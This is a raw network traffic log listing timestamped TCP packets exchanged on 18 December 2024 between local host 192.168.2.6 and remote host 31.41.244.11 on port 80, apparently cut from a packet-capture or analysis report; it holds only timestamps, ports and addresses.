                                                                                                                                                              Dec 18, 2024 11:47:45.450057983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.451112032 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.451148033 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.451221943 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.451257944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.452301979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.452344894 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.452408075 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.452442884 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.453551054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.453572035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.453594923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.453615904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.454653978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.454699039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.454756021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.454791069 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.455810070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.455849886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.455897093 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.455930948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.456981897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.457019091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.457042933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.457072020 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.458132982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.458178997 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.458239079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.458271980 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.459348917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.459387064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.459431887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.459465027 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.460519075 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.460561037 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.460625887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.460660934 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.461680889 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.461726904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.461791992 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.461826086 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.462975979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.463026047 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.463074923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.463109016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.464195013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.464236021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.464255095 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.464289904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.465244055 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.465286970 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.465346098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.465380907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.466377974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.466424942 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.466450930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.466485977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.467526913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.467569113 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.467633009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.467668056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.468715906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.468753099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.468796015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.468827009 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.469949007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.469995022 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.470057011 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.470096111 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.471075058 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.471126080 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.471168995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.471208096 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.472225904 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.472266912 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.472322941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.472368002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.473428011 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.473473072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.473649979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.473689079 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.474639893 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.474685907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.474771976 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.474809885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.475836992 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.475886106 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.475949049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.475995064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.476968050 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.477020025 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.477047920 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.477086067 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.478113890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.478149891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.478158951 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.478182077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.608783007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.608809948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.608938932 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.610306978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.610328913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.610346079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.610373974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.610388041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.611072063 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.611119032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.612118006 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.612142086 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.612160921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.612183094 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.612183094 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.612200975 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.613641024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.613663912 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.613698959 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.613711119 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.614152908 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.614203930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.614347935 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.614432096 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.615405083 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.615468025 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.616609097 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.616626024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.616643906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.616663933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.616678953 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.618356943 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.618374109 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.618422985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.618453026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.619375944 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.619391918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.619432926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.619432926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.620620012 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.620635986 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.620677948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.620678902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.621375084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.621426105 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.621431112 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.621473074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.622600079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.622659922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.622723103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.622771025 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.623753071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.623810053 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.623956919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.624011040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.624829054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.624882936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.625047922 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.625101089 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.626391888 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.626429081 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.626467943 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.626467943 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.627420902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.627459049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.627475977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.627502918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.628412962 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.628449917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.628468037 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.628490925 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.629862070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.629898071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.629951000 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.629981041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.631800890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.631839037 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.631870031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.631875038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.631894112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.631937981 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.633001089 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.633043051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.633095980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.633100986 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.633141994 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.634162903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.634200096 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.634217978 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.634268045 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.636668921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.636707067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.636724949 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.636753082 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.638704062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.638737917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.638755083 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.638773918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.638777971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.638819933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.638998985 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.639051914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.639739037 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.639775991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.639795065 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.639815092 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.640950918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.640986919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.641009092 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.641022921 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.641163111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.641221046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.641272068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.641321898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.642692089 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.642729044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.642748117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.642771006 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.643527031 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.643580914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.644303083 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.644357920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.644862890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.644898891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.644913912 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.644943953 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.646430969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.646478891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.646498919 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.646536112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.648116112 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.648164988 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.648169041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.648205042 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.648205042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.648247004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.649499893 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.649544001 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.649550915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.649581909 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.649581909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.649620056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.651305914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.651376009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.651382923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.651417971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.652173042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.652223110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.652288914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.652337074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.654062033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.654086113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.654104948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.654114008 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.654145956 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.654145956 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.655299902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.655330896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.655348063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.655349016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.655359983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.655384064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.656759977 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.656781912 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.656807899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.656843901 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.658364058 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.658394098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.658412933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.658436060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.659147024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.659166098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.659193039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.659204960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.660245895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.660301924 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.660414934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.660456896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.661170959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.661190033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.661211967 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.661230087 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.663522005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.663539886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.663558006 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.663570881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.663590908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.663599968 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.664433956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.664477110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.664494991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.664535046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.665760040 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.665777922 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.665801048 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.665805101 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.665823936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.665841103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.667947054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.667965889 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.667984962 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.667995930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.668014050 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.668025970 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.668561935 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.668610096 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.672008991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.672028065 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.672060966 CET4987880192.168.2.631.41.244.11
